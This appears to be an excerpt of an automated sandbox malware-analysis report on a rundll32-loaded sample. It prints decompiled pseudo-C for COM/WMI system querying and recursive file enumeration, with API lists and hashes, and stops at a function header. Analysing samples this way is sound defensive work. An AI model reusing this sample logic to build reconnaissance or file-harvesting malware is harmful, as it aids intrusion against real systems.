0x00000000
0x0494b4dc
0x0494b4e2
0x0494b4e2
0x0494b4e4
0x0494b4e4
0x0494b4e7
0x0494b4e7
0x0494b4ec
0x0494b4f4
0x0494b500

APIs

Sleep.KERNELBASE(0000000A), ref: 0494B4F4

Memory Dump Source

Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true

Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 80b2864fcd0a5bc6f51640cbc4593d05ca0025714b5da3272ba9ae1df4bf6769
Instruction ID: a711420bb66b9cca3741799e49430b50fffcb77c40f3e71aaf685206d83a853a
Opcode Fuzzy Hash: 80b2864fcd0a5bc6f51640cbc4593d05ca0025714b5da3272ba9ae1df4bf6769
Instruction Fuzzy Hash: 9A111B71A04309EFDB14CFA9D585E99B7E8FB88324F10846AE95A9B340D274F940CB40

Uniqueness

Uniqueness Score: -1.00%

Function 046B04E8 Relevance: 1.3, APIs: 1, Instructions: 12memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00002F24,?,00002F24), ref: 046B04CD

Memory Dump Source

Source File: 00000011.00000003.409606495.00000000046B0000.00000020.00001000.00020000.00000000.sdmp, Offset: 046B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_3_46b0000_rundll32.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 459ceca762080cf357c362edab4f1ee4805586002f586a962786011784d06284
Instruction ID: b10770db1e9388dcee0aa395ba77e9f53165220c315ddfd99952fd0b0b8f4329
Opcode Fuzzy Hash: 459ceca762080cf357c362edab4f1ee4805586002f586a962786011784d06284
Instruction Fuzzy Hash: 12D01270E0434CFFDB448ED08A847ED7D75EB04309F104414A14666143F7341F81A740

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0494D213 Relevance: 7.6, APIs: 5, Instructions: 87
commemoryCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E0494D213(void* __ecx) {
				char _v8;
				void* _v12;
				char* _t15;
				intOrPtr* _t16;
				void* _t21;
				intOrPtr* _t23;
				intOrPtr* _t24;
				intOrPtr* _t25;
				void* _t30;
				void* _t33;

				_v12 = 0;
				_v8 = 0;
				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
				_t15 =  &_v12;
				__imp__CoCreateInstance(0x495d848, 0, 1, 0x495d858, _t15);
				if(_t15 < 0) {
					L5:
					_t23 = _v8;
					if(_t23 != 0) {
						 *((intOrPtr*)( *_t23 + 8))(_t23);
					}
					_t24 = _v12;
					if(_t24 != 0) {
						 *((intOrPtr*)( *_t24 + 8))(_t24);
					}
					_t16 = 0;
				} else {
					__imp__#2(__ecx);
					_t25 = _v12;
					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
					if(_t21 < 0) {
						goto L5;
					} else {
						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
						if(_t21 < 0) {
							goto L5;
						} else {
							_t16 = E0494911F(8);
							if(_t16 == 0) {
								goto L5;
							} else {
								 *((intOrPtr*)(_t16 + 4)) = _v12;
								 *_t16 = _v8;
							}
						}
					}
				}
				return _t16;
			}

0x0494d220
0x0494d223
0x0494d226
0x0494d237
0x0494d23d
0x0494d24e
0x0494d256
0x0494d2a7
0x0494d2a7
0x0494d2ac
0x0494d2b1
0x0494d2b1
0x0494d2b4
0x0494d2b9
0x0494d2be
0x0494d2be
0x0494d2c1
0x0494d258
0x0494d259
0x0494d25f
0x0494d270
0x0494d275
0x00000000
0x0494d277
0x0494d284
0x0494d28c
0x00000000
0x0494d28e
0x0494d290
0x0494d298
0x00000000
0x0494d29a
0x0494d29d
0x0494d2a3
0x0494d2a3
0x0494d298
0x0494d28c
0x0494d275
0x0494d2c6

APIs

CoInitializeEx.OLE32(00000000,00000000,00000000,00000000,00000000,00000000,?,0494D3CE,00000EFA,00000000,00000000,00000005), ref: 0494D226
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,0494D3CE,00000EFA,00000000,00000000,00000005), ref: 0494D237
CoCreateInstance.OLE32(0495D848,00000000,00000001,0495D858,00000000,?,0494D3CE,00000EFA,00000000,00000000,00000005), ref: 0494D24E
SysAllocString.OLEAUT32(00000000), ref: 0494D259
CoSetProxyBlanket.OLE32(00000005,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,0494D3CE,00000EFA,00000000,00000000,00000005), ref: 0494D284

Memory Dump Source

Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true

Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd

Similarity

API ID: Initialize$AllocBlanketCreateInstanceProxySecurityString
String ID:
API String ID: 3531828250-0
Opcode ID: 6737490ee26a49ccf70a8dfe6a4a3d293c11202c85fcf5028d32e8e879f2990b
Instruction ID: 68b4462bd7dd5207824738070bc75741ea5d0350ccc736624b7bca122d36915d
Opcode Fuzzy Hash: 6737490ee26a49ccf70a8dfe6a4a3d293c11202c85fcf5028d32e8e879f2990b
Instruction Fuzzy Hash: 64210974600245BFEB249BA6DC5DE6BBF7CEFC6B15F10426CF501A7290D674AA00CA30

Uniqueness

Uniqueness Score: -1.00%

Function 04949DA8 Relevance: 3.1, APIs: 2, Instructions: 105
fileCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E04949DA8(void* __ecx, void* __fp0, intOrPtr _a16) {
				char _v12;
				WCHAR* _v16;
				struct _WIN32_FIND_DATAW _v608;
				WCHAR* _t24;
				intOrPtr _t31;
				intOrPtr _t41;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				intOrPtr _t54;
				void* _t59;
				char _t60;
				void* _t61;
				void* _t62;
				void* _t63;
				void* _t75;

				_t75 = __fp0;
				_push(0);
				_t48 = __ecx;
				_push(L"\\*");
				_t24 = E04949924(__ecx);
				_t63 = _t62 + 0xc;
				_v16 = _t24;
				if(_t24 == 0) {
					return _t24;
				}
				_t59 = FindFirstFileW(_t24,  &_v608);
				if(_t59 == 0xffffffff) {
					L14:
					return E0494913B( &_v16, 0xfffffffe);
				} else {
					goto L2;
				}
				do {
					L2:
					if(E04949D80( &(_v608.cFileName)) != 0) {
						goto L12;
					}
					if((_v608.dwFileAttributes & 0x00000010) != 0) {
						L10:
						_push(0);
						_push( &(_v608.cFileName));
						_push("\\");
						_t60 = E04949924(_t48);
						_t63 = _t63 + 0x10;
						_v12 = _t60;
						if(_t60 != 0) {
							_t54 =  *0x4960fa0; // 0x49ff8a0
							 *((intOrPtr*)(_t54 + 0xc4))(1);
							_push(1);
							_push(1);
							_push(0);
							E04949DA8(_t60, _t75, 1, 5, E04950A46, _a16);
							_t63 = _t63 + 0x1c;
							E0494913B( &_v12, 0xfffffffe);
						}
						goto L12;
					}
					_t61 = 0;
					do {
						_push( *((intOrPtr*)(_t61 + 0x49610cc)));
						_push( &(_v608.cFileName));
						_t41 =  *0x4960fe0; // 0x49ffbe0
						if( *((intOrPtr*)(_t41 + 0x18))() == 0) {
							goto L8;
						}
						_t45 = E04950A46(_t75, _t48,  &_v608, _a16);
						_t63 = _t63 + 0xc;
						if(_t45 == 0) {
							break;
						}
						_t46 =  *0x4960fa0; // 0x49ff8a0
						 *((intOrPtr*)(_t46 + 0xc4))(1);
						L8:
						_t61 = _t61 + 4;
					} while (_t61 < 4);
					if((_v608.dwFileAttributes & 0x00000010) == 0) {
						goto L12;
					}
					goto L10;
					L12:
				} while (FindNextFileW(_t59,  &_v608) != 0);
				_t31 =  *0x4960fa0; // 0x49ff8a0
				 *((intOrPtr*)(_t31 + 0x84))(_t59);
				goto L14;
			}

0x04949da8
0x04949db4
0x04949db6
0x04949db8
0x04949dbe
0x04949dc3
0x04949dc6
0x04949dcb
0x04949ee7
0x04949ee7
0x04949ddf
0x04949de4
0x04949ed6
0x00000000
0x00000000
0x00000000
0x00000000
0x04949dea
0x04949dea
0x04949df7
0x00000000
0x00000000
0x04949e05
0x04949e58
0x04949e58
0x04949e60
0x04949e61
0x04949e6c
0x04949e6e
0x04949e71
0x04949e76
0x04949e78
0x04949e80
0x04949e86
0x04949e88
0x04949e8a
0x04949e9f
0x04949ea4
0x04949ead
0x04949eb3
0x00000000
0x04949e76
0x04949e07
0x04949e09
0x04949e09
0x04949e15
0x04949e16
0x04949e20
0x00000000
0x00000000
0x04949e2d
0x04949e32
0x04949e37
0x00000000
0x00000000
0x04949e39
0x04949e40
0x04949e46
0x04949e46
0x04949e49
0x04949e56
0x00000000
0x00000000
0x00000000
0x04949eb4
0x04949ec2
0x04949eca
0x04949ed0
0x00000000

APIs

FindFirstFileW.KERNEL32(00000000,?,?,00000000,00000000), ref: 04949DD9
FindNextFileW.KERNEL32(00000000,?), ref: 04949EBC

Memory Dump Source

Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true

Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd

Similarity

API ID: FileFind$FirstNext
String ID:
API String ID: 1690352074-0
Opcode ID: 5541696d79f63d508449c09cd331c1883ee1c15fbb20ab08347d10db39ff988d
Instruction ID: 13550f322ba5ac10fe3c24484d6a48b9fa10f09c52fa586142839f0441116417
Opcode Fuzzy Hash: 5541696d79f63d508449c09cd331c1883ee1c15fbb20ab08347d10db39ff988d
Instruction Fuzzy Hash: 073184B1A40215AFEB20DA74DC8DFAB37ACEB84714F140179FA09A61C1E675AA418B60

Uniqueness

Uniqueness Score: -1.00%

Function 0494C2D1 Relevance: 1.5, APIs: 1, Instructions: 24timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,04941CDE,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0494C2DE

Memory Dump Source

Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true

Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd

Similarity

API ID: Time$FileSystem
String ID:
API String ID: 2086374402-0
Opcode ID: d245bfd6c313fffcb8e21e10a33fe823edbc8da8202e0278154c7cf161017beb
Instruction ID: 04bbc7248e48568ff5c143e033daef9b20f84cab5d13a664b92d1d604f8db341
Opcode Fuzzy Hash: d245bfd6c313fffcb8e21e10a33fe823edbc8da8202e0278154c7cf161017beb
Instruction Fuzzy Hash: 12E04FB6901314AFD720EE78DD05FAEBBBCEBC0B14F114664AC45B7348E670AE088794

Uniqueness

Uniqueness Score: -1.00%

Function 0494B883 Relevance: 1.5, APIs: 1, Instructions: 15
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0494B883(void* __ecx) {
				struct _SYSTEM_INFO _v40;
				void* _t5;

				if(__ecx == 0) {
					GetSystemInfo( &_v40);
					return _v40.dwOemId & 0x0000ffff;
				} else {
					_t5 = 9;
					return _t5;
				}
			}

0x0494b88b
0x0494b896
0x0494b8a1
0x0494b88d
0x0494b88f
0x0494b891
0x0494b891

APIs

GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,0494BD6E,?,?,00000000), ref: 0494B896

Memory Dump Source

Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true

Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 7d83ecb3f3fa960408e7790c1965889c0e0e8622669d436b668059333b479601
Instruction ID: 1c315330aa96b9c6a1dd77b55bb44dc8d7ca268ea841c940b81e99581c476a7a
Opcode Fuzzy Hash: 7d83ecb3f3fa960408e7790c1965889c0e0e8622669d436b668059333b479601
Instruction Fuzzy Hash: D4C0126160430D56CF449BA5A616AAE76EC5B44609F2001B5EA06F1081E655ED414361

Uniqueness

Uniqueness Score: -1.00%

Function 0494D6E7 Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 388
memoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E0494D6E7(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void* _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				signed int _v60;
				char* _v72;
				signed short _v80;
				signed int _v84;
				char _v88;
				char _v92;
				char _v96;
				intOrPtr _v100;
				char _v104;
				char _v616;
				intOrPtr* _t159;
				char _t165;
				signed int _t166;
				signed int _t173;
				signed int _t178;
				signed int _t186;
				intOrPtr* _t187;
				signed int _t188;
				signed int _t192;
				intOrPtr* _t193;
				intOrPtr _t200;
				intOrPtr* _t205;
				signed int _t207;
				signed int _t209;
				intOrPtr* _t210;
				intOrPtr _t212;
				intOrPtr* _t213;
				signed int _t214;
				char _t217;
				signed int _t218;
				signed int _t219;
				signed int _t230;
				signed int _t235;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr* _t247;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr* _t253;
				void* _t255;
				intOrPtr* _t261;
				signed int _t262;
				signed int _t283;
				signed int _t289;
				char* _t298;
				void* _t320;
				signed int _t322;
				intOrPtr* _t323;
				intOrPtr _t324;
				signed int _t327;
				intOrPtr* _t328;
				intOrPtr* _t329;

				_v32 = _v32 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v56 = __edx;
				_v100 = __ecx;
				_t159 = E0494D213(__ecx);
				_t251 = _t159;
				_v104 = _t251;
				if(_t251 == 0) {
					return _t159;
				}
				_t320 = E0494911F(0x10);
				_v36 = _t320;
				_pop(_t255);
				if(_t320 == 0) {
					L53:
					E0494913B( &_v60, 0xfffffffe);
					E0494D2C7( &_v104);
					return _t320;
				}
				_t165 = E049490EA(_t255, 0x101c);
				 *_t328 = 0xa18;
				_v52 = _t165;
				_t166 = E049490EA(_t255);
				_push(0);
				_push(_v56);
				_v20 = _t166;
				_push(_t166);
				_push(_a4);
				_t322 = E04949924(_t165);
				_v60 = _t322;
				E04949D66( &_v52);
				E04949D66( &_v20);
				_t329 = _t328 + 0x20;
				if(_t322 != 0) {
					_t323 = __imp__#2;
					_v40 =  *_t323(_t322);
					_t173 = E049490EA(_t255, 0x10b4);
					_v20 = _t173;
					_v52 =  *_t323(_t173);
					E04949D66( &_v20);
					_t324 = _v40;
					_t261 =  *_t251;
					_t252 = 0;
					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
					__eflags = _t178;
					if(_t178 != 0) {
						L52:
						__imp__#6(_t324);
						__imp__#6(_v52);
						goto L53;
					}
					_t262 = _v32;
					_v28 = 0;
					_v20 = 0;
					__eflags = _t262;
					if(_t262 == 0) {
						L49:
						 *((intOrPtr*)( *_t262 + 8))(_t262);
						__eflags = _t252;
						if(_t252 == 0) {
							E0494913B( &_v36, 0);
							_t320 = _v36;
						} else {
							 *(_t320 + 8) = _t252;
							 *_t320 = E04949787(_v100);
							 *((intOrPtr*)(_t320 + 4)) = E04949787(_v56);
						}
						goto L52;
					} else {
						goto L6;
					}
					while(1) {
						L6:
						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
						__eflags = _t186;
						if(_t186 != 0) {
							break;
						}
						_v16 = 0;
						_v48 = 0;
						_v12 = 0;
						_v24 = 0;
						__eflags = _v84;
						if(_v84 == 0) {
							break;
						}
						_t187 = _v28;
						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
						__eflags = _t188;
						if(_t188 >= 0) {
							__imp__#20(_v24, 1,  &_v16);
							__imp__#19(_v24, 1,  &_v48);
							_t46 = _t320 + 0xc; // 0xc
							_t253 = _t46;
							_t327 = _t252 << 3;
							_t47 = _t327 + 8; // 0x8
							_t192 = E049491B9(_t327, _t47);
							__eflags = _t192;
							if(_t192 == 0) {
								__imp__#16(_v24);
								_t193 = _v28;
								 *((intOrPtr*)( *_t193 + 8))(_t193);
								L46:
								_t252 = _v20;
								break;
							}
							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E0494911F( *(_t327 +  *_t253) << 3);
							_t200 =  *_t253;
							__eflags =  *(_t327 + _t200 + 4);
							if( *(_t327 + _t200 + 4) == 0) {
								_t136 = _t320 + 0xc; // 0xc
								E0494913B(_t136, 0);
								E0494913B( &_v36, 0);
								__imp__#16(_v24);
								_t205 = _v28;
								 *((intOrPtr*)( *_t205 + 8))(_t205);
								_t320 = _v36;
								goto L46;
							}
							_t207 = _v16;
							while(1) {
								_v12 = _t207;
								__eflags = _t207 - _v48;
								if(_t207 > _v48) {
									break;
								}
								_v44 = _v44 & 0x00000000;
								_t209 =  &_v12;
								__imp__#25(_v24, _t209,  &_v44);
								__eflags = _t209;
								if(_t209 < 0) {
									break;
								}
								_t212 = E04949787(_v44);
								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
								_t213 = _v28;
								_t281 =  *_t213;
								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
								__eflags = _t214;
								if(_t214 < 0) {
									L39:
									__imp__#6(_v44);
									_t207 = _v12 + 1;
									__eflags = _t207;
									continue;
								}
								_v92 = E049490EA(_t281, 0xe23);
								 *_t329 = 0x375;
								_t217 = E049490EA(_t281);
								_t283 = _v80;
								_v96 = _t217;
								_t218 = _t283 & 0x0000ffff;
								__eflags = _t218 - 0xb;
								if(__eflags > 0) {
									_t219 = _t218 - 0x10;
									__eflags = _t219;
									if(_t219 == 0) {
										L35:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E0494911F(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											L38:
											E04949D66( &_v92);
											E04949D66( &_v96);
											__imp__#9( &_v80);
											goto L39;
										}
										_push(_v72);
										_push(L"%d");
										L37:
										_push(0xc);
										_push(_t289);
										E0494C08E();
										_t329 = _t329 + 0x10;
										goto L38;
									}
									_t230 = _t219 - 1;
									__eflags = _t230;
									if(_t230 == 0) {
										L33:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E0494911F(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											goto L38;
										}
										_push(_v72);
										_push(L"%u");
										goto L37;
									}
									_t235 = _t230 - 1;
									__eflags = _t235;
									if(_t235 == 0) {
										goto L33;
									}
									__eflags = _t235 == 1;
									if(_t235 == 1) {
										goto L33;
									}
									L28:
									__eflags = _t283 & 0x00002000;
									if((_t283 & 0x00002000) == 0) {
										_v88 = E049490EA(_t283, 0xedb);
										E0494C08E( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
										E04949D66( &_v88);
										_t329 = _t329 + 0x18;
										_t298 =  &_v616;
										L31:
										_t242 = E04949787(_t298);
										L32:
										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
										goto L38;
									}
									_t242 = E0494D5CB( &_v80);
									goto L32;
								}
								if(__eflags == 0) {
									__eflags = _v72 - 0xffff;
									_t298 = L"TRUE";
									if(_v72 != 0xffff) {
										_t298 = L"FALSE";
									}
									goto L31;
								}
								_t243 = _t218 - 1;
								__eflags = _t243;
								if(_t243 == 0) {
									goto L38;
								}
								_t244 = _t243 - 1;
								__eflags = _t244;
								if(_t244 == 0) {
									goto L35;
								}
								_t245 = _t244 - 1;
								__eflags = _t245;
								if(_t245 == 0) {
									goto L35;
								}
								__eflags = _t245 != 5;
								if(_t245 != 5) {
									goto L28;
								}
								_t298 = _v72;
								goto L31;
							}
							__imp__#16(_v24);
							_t210 = _v28;
							 *((intOrPtr*)( *_t210 + 8))(_t210);
							_t252 = _v20;
							L42:
							_t262 = _v32;
							_t252 = _t252 + 1;
							_v20 = _t252;
							__eflags = _t262;
							if(_t262 != 0) {
								continue;
							}
							L48:
							_t324 = _v40;
							goto L49;
						}
						_t247 = _v28;
						 *((intOrPtr*)( *_t247 + 8))(_t247);
						goto L42;
					}
					_t262 = _v32;
					goto L48;
				} else {
					E0494913B( &_v36, _t322);
					_t320 = _v36;
					goto L53;
				}
			}

0x0494d6f0
0x0494d6f6
0x0494d6fd
0x0494d700
0x0494d703
0x0494d708
0x0494d70a
0x0494d70f
0x0494db57
0x0494db57
0x0494d71c
0x0494d71e
0x0494d721
0x0494d724
0x0494db3c
0x0494db42
0x0494db4c
0x00000000
0x0494db51
0x0494d72f
0x0494d736
0x0494d73d
0x0494d740
0x0494d745
0x0494d747
0x0494d74a
0x0494d74d
0x0494d74e
0x0494d757
0x0494d75d
0x0494d760
0x0494d769
0x0494d76e
0x0494d773
0x0494d78a
0x0494d797
0x0494d79a
0x0494d7a1
0x0494d7a6
0x0494d7ad
0x0494d7b2
0x0494d7b9
0x0494d7bb
0x0494d7c7
0x0494d7ca
0x0494d7cc
0x0494db2c
0x0494db2d
0x0494db36
0x00000000
0x0494db36
0x0494d7d2
0x0494d7d5
0x0494d7d8
0x0494d7db
0x0494d7dd
0x0494daf8
0x0494dafb
0x0494dafe
0x0494db00
0x0494db22
0x0494db27
0x0494db02
0x0494db05
0x0494db10
0x0494db17
0x0494db17
0x00000000
0x00000000
0x00000000
0x00000000
0x0494d7e3
0x0494d7e3
0x0494d7f5
0x0494d7f8
0x0494d7fa
0x00000000
0x00000000
0x0494d802
0x0494d805
0x0494d808
0x0494d80b
0x0494d80e
0x0494d811
0x00000000
0x00000000
0x0494d817
0x0494d825
0x0494d828
0x0494d82a
0x0494d843
0x0494d852
0x0494d85a
0x0494d85a
0x0494d85d
0x0494d864
0x0494d868
0x0494d86e
0x0494d870
0x0494dae0
0x0494dae6
0x0494daec
0x0494daef
0x0494daef
0x00000000
0x0494daef
0x0494d87f
0x0494d893
0x0494d897
0x0494d899
0x0494d89e
0x0494daad
0x0494dab3
0x0494dabe
0x0494dac9
0x0494dacf
0x0494dad5
0x0494dad8
0x00000000
0x0494dad8
0x0494d8a4
0x0494da7b
0x0494da7b
0x0494da7e
0x0494da81
0x00000000
0x00000000
0x0494d8ac
0x0494d8b4
0x0494d8bb
0x0494d8c1
0x0494d8c3
0x00000000
0x00000000
0x0494d8cc
0x0494d8e1
0x0494d8e7
0x0494d8f0
0x0494d8f3
0x0494d8f6
0x0494d8f8
0x0494da6e
0x0494da71
0x0494da7a
0x0494da7a
0x00000000
0x0494da7a
0x0494d908
0x0494d90b
0x0494d912
0x0494d918
0x0494d91b
0x0494d91e
0x0494d921
0x0494d924
0x0494d960
0x0494d960
0x0494d963
0x0494da0f
0x0494da23
0x0494da33
0x0494da37
0x0494da39
0x0494da50
0x0494da54
0x0494da5d
0x0494da68
0x00000000
0x0494da68
0x0494da3f
0x0494da40
0x0494da45
0x0494da45
0x0494da47
0x0494da48
0x0494da4d
0x00000000
0x0494da4d
0x0494d969
0x0494d969
0x0494d96c
0x0494d9d7
0x0494d9eb
0x0494d9fb
0x0494d9ff
0x0494da01
0x00000000
0x00000000
0x0494da07
0x0494da08
0x00000000
0x0494da08
0x0494d96e
0x0494d96e
0x0494d971
0x00000000
0x00000000
0x0494d973
0x0494d976
0x00000000
0x00000000
0x0494d978
0x0494d978
0x0494d97e
0x0494d99a
0x0494d9a9
0x0494d9b2
0x0494d9b7
0x0494d9ba
0x0494d9c0
0x0494d9c0
0x0494d9c5
0x0494d9d1
0x00000000
0x0494d9d1
0x0494d983
0x00000000
0x0494d983
0x0494d926
0x0494d94d
0x0494d952
0x0494d957
0x0494d959
0x0494d959
0x00000000
0x0494d957
0x0494d928
0x0494d928
0x0494d92b
0x00000000
0x00000000
0x0494d931
0x0494d931
0x0494d934
0x00000000
0x00000000
0x0494d93a
0x0494d93a
0x0494d93d
0x00000000
0x00000000
0x0494d943
0x0494d946
0x00000000
0x00000000
0x0494d948
0x00000000
0x0494d948
0x0494da8a
0x0494da90
0x0494da96
0x0494da99
0x0494da9c
0x0494da9c
0x0494da9f
0x0494daa0
0x0494daa3
0x0494daa5
0x00000000
0x00000000
0x0494daf5
0x0494daf5
0x00000000
0x0494daf5
0x0494d82c
0x0494d832
0x00000000
0x0494d832
0x0494daf2
0x00000000
0x0494d775
0x0494d77a
0x0494d77f
0x00000000
0x0494d783

APIs

Part of subcall function 0494D213: CoInitializeEx.OLE32(00000000,00000000,00000000,00000000,00000000,00000000,?,0494D3CE,00000EFA,00000000,00000000,00000005), ref: 0494D226
Part of subcall function 0494D213: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,0494D3CE,00000EFA,00000000,00000000,00000005), ref: 0494D237
Part of subcall function 0494D213: CoCreateInstance.OLE32(0495D848,00000000,00000001,0495D858,00000000,?,0494D3CE,00000EFA,00000000,00000000,00000005), ref: 0494D24E
Part of subcall function 0494D213: SysAllocString.OLEAUT32(00000000), ref: 0494D259
Part of subcall function 0494D213: CoSetProxyBlanket.OLE32(00000005,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,0494D3CE,00000EFA,00000000,00000000,00000005), ref: 0494D284

SysAllocString.OLEAUT32(00000000), ref: 0494D790
SysAllocString.OLEAUT32(00000000), ref: 0494D7A4
SysFreeString.OLEAUT32(?), ref: 0494DB2D
SysFreeString.OLEAUT32(?), ref: 0494DB36

Part of subcall function 0494913B: HeapFree.KERNEL32(00000000,00000000), ref: 04949181

Strings

TRUE, xrefs: 0494D952
FALSE, xrefs: 0494D959

Memory Dump Source

Source File: 00000011.00000002.418668254.0000000004941000.00000020.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: true

Associated: 00000011.00000002.418664056.0000000004940000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418699067.000000000495A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418707278.000000000495F000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.418712931.0000000004962000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4940000_rundll32.jbxd

Similarity

API ID: String$AllocFree$Initialize$BlanketCreateHeapInstanceProxySecurity
String ID: FALSE$TRUE
API String ID: 318989454-1412513891
Opcode ID: 104ca730e1858a121d9e49b5c619e7c4aa2800eb557c0f8ca6802aa0c5e3a7e9
Instruction ID: b11d316214c5d17a7d1df961e11ee360d8d0f34ad582410c7ada6e75a3eef6f1
Opcode Fuzzy Hash: 104ca730e1858a121d9e49b5c619e7c4aa2800eb557c0f8ca6802aa0c5e3a7e9
Instruction Fuzzy Hash: 3DE13DB5A00219AFDF14DFE4C898EAEBBB9FFC9304F104669E505A7284DB75B901CB50

Uniqueness

Uniqueness Score: -1.00%

Function 04953175 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 66
libraryloaderCOMMON

